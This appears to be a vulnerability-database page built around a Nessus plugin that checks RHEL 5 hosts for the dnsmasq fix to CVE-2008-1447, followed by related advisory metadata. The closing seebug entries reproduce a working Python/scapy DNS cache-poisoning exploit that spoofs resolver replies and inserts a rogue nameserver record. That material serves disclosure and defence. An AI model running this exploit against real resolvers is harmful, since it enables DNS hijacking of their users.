ID REDHAT-RHSA-2008-0789.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2008-08-12T00:00:00
Description
An updated dnsmasq package that implements UDP source-port
randomization is now available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed
to provide DNS and, optionally, DHCP, to a small network.
The dnsmasq DNS resolver used a fixed source UDP port. This could have
made DNS spoofing attacks easier. dnsmasq has been updated to use
random UDP source ports, helping to make DNS spoofing attacks harder.
(CVE-2008-1447)
All dnsmasq users are advised to upgrade to this updated package, that
upgrades dnsmasq to version 2.45, which resolves this issue.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2008:0789. The text
# itself is copyright (C) Red Hat, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(33865);
script_version("1.40");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2008-1447");
script_bugtraq_id(30131);
script_xref(name:"RHSA", value:"2008:0789");
script_xref(name:"IAVA", value:"2008-A-0045");
script_name(english:"RHEL 5 : dnsmasq (RHSA-2008:0789)");
script_summary(english:"Checks the rpm output for the updated package");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"An updated dnsmasq package that implements UDP source-port
randomization is now available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed
to provide DNS and, optionally, DHCP, to a small network.
The dnsmasq DNS resolver used a fixed source UDP port. This could have
made DNS spoofing attacks easier. dnsmasq has been updated to use
random UDP source ports, helping to make DNS spoofing attacks harder.
(CVE-2008-1447)
All dnsmasq users are advised to upgrade to this updated package, that
upgrades dnsmasq to version 2.45, which resolves this issue."
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-1447"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2008:0789"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected dnsmasq package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:dnsmasq");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.2");
script_set_attribute(attribute:"vuln_publication_date", value:"2008/07/08");
script_set_attribute(attribute:"patch_publication_date", value:"2008/08/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/08/12");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_set_attribute(attribute:"stig_severity", value:"I");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
rhsa = "RHSA-2008:0789";
yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
if (!empty_or_null(yum_report))
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : yum_report
);
exit(0);
}
else
{
audit_message = "affected by Red Hat security advisory " + rhsa;
audit(AUDIT_OS_NOT, audit_message);
}
}
else
{
flag = 0;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"dnsmasq-2.45-1.el5_2.1")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"dnsmasq-2.45-1.el5_2.1")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"dnsmasq-2.45-1.el5_2.1")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "dnsmasq");
}
}
{"id": "REDHAT-RHSA-2008-0789.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : dnsmasq (RHSA-2008:0789)", "description": "An updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "published": "2008-08-12T00:00:00", "modified": "2008-08-12T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://www.tenable.com/plugins/nessus/33865", "reporter": "This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/errata/RHSA-2008:0789", "http://www.thekelleys.org.uk/dnsmasq/CHANGELOG", "https://access.redhat.com/security/cve/cve-2008-1447"], "cvelist": ["CVE-2008-1447"], "type": "nessus", "lastseen": "2021-01-17T13:06:15", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1447"]}, {"type": "f5", "idList": ["SOL8938"]}, {"type": "openvas", "idList": ["OPENVAS:870106", "OPENVAS:1361412562310104103", "OPENVAS:1361412562310830506", "OPENVAS:136141256231065809", "OPENVAS:880206", "OPENVAS:880037", "OPENVAS:1361412562310122571", "OPENVAS:1361412562310835164", "OPENVAS:1361412562310880206", "OPENVAS:61383"]}, {"type": "centos", "idList": ["CESA-2008:0533", "CESA-2008:0533-03"]}, {"type": "nessus", "idList": ["SUSE_11_0_BIND-080708.NASL", "DEBIAN_DSA-1617.NASL", "FEDORA_2009-1069.NASL", "ORACLELINUX_ELSA-2008-0789.NASL", "CISCO-SA-20080708-DNSHTTP.NASL", "SUSE_BIND-5409.NASL", "DNS_NON_RANDOM_SOURCE_PORTS.NASL", "DEBIAN_DSA-1604.NASL", "FREEBSD_PKG_959D384D6B5911DD9D79001FC61C2A55.NASL", "SUSE_BIND-5410.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68471"]}, {"type": "seebug", "idList": ["SSV:65607", "SSV:9165", "SSV:9178", "SSV:9168"]}, {"type": "redhat", "idList": ["RHSA-2008:0789", "RHSA-2008:0533"]}, {"type": "fedora", "idList": ["FEDORA:M69LJTSU027591"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0789", "ELSA-2008-0533"]}, {"type": "slackware", "idList": ["SSA-2008-334-01", "SSA-2008-205-01"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20222", "SECURITYVULNS:DOC:20146", "SECURITYVULNS:DOC:20145"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D"]}, {"type": "nmap", "idList": ["NMAP:DNS-RANDOM-SRCPORT.NSE", "NMAP:DNS-RANDOM-TXID.NSE"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1605-1:9D185", "DEBIAN:DSA-1619-2:7599F", "DEBIAN:DSA-1623-1:F6633", "DEBIAN:DSA-1619-1:BCCB7", "DEBIAN:DSA-1603-1:C7E04"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_HOST", "MSF:AUXILIARY/SPOOF/DNS/BAILIWICKED_DOMAIN"]}, {"type": "freebsd", "idList": ["655EE1EC-511B-11DD-80BA-000BCDF0A03B", "959D384D-6B59-11DD-9D79-001FC61C2A55"]}], "modified": "2021-01-17T13:06:15", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2021-01-17T13:06:15", "rev": 2}, "vulnersScore": 4.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0789. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33865);\n script_version(\"1.40\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"RHEL 5 : dnsmasq (RHSA-2008:0789)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0789\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0789\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "33865", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dnsmasq", "cpe:/o:redhat:enterprise_linux:5.2"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:50:58", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management > Configuration > Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": "SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = "X.X.X.X"\n# Vulnerable recursive DNS server\ntargetdns = "X.X.X.X"\n# Authoritative NS for the target domain\nsrcdns = ["X.X.X.X"]\n\n# Domain to play with\ndummydomain = ""\nbasedomain = ".example.com."\n# sub-domain to claim authority on\ndomain = "sub.example.com."\n# Spoofed authoritative DNS for the sub-domain\nspoof="ns.evil.com."\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = "a" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\n\t\t\tbreak\n\texcept:\n\t\tprint "Poisonning failed"\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}, {"lastseen": "2017-11-19T21:33:50", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9168", "id": "SSV:9168", "sourceData": "\n from scapy import *\r\nimport random\r\n\r\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\r\n# http://www.solisproject.net/\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n\r\n# This script exploit the flaw discovered by Dan Kaminsky\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\n# http://www.kb.cert.org/vuls/id/800113\r\n\r\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\r\n# the transaction ID.\r\n# It also insert Authority record for a valid record of the target domain.\r\n\r\n# To use this script, you have to discover the source port used by the vulnerable\r\n# DNS server.\r\n# Python is really slow, so it will take some time, but it works :-)\r\n\r\n\r\n# IP to insert for our dummy record\r\ntargetip = "X.X.X.X"\r\n# Vulnerable recursive DNS server\r\ntargetdns = "X.X.X.X"\r\n# Authoritative NS for the target domain\r\nsrcdns = ["X.X.X.X"]\r\n\r\n# Domain to play with\r\ndummydomain = ""\r\nbasedomain = ".example.com."\r\n# sub-domain to claim authority on\r\ndomain = "sub.example.com."\r\n# Spoofed authoritative DNS for the sub-domain\r\nspoof="ns.evil.com."\r\n# src port of vulnerable DNS for recursive queries\r\ndnsport = 32883\r\n\r\n# base packet\r\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\r\n\tUDP(sport=53, dport=dnsport)/ \\\r\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \r\n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \r\n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, 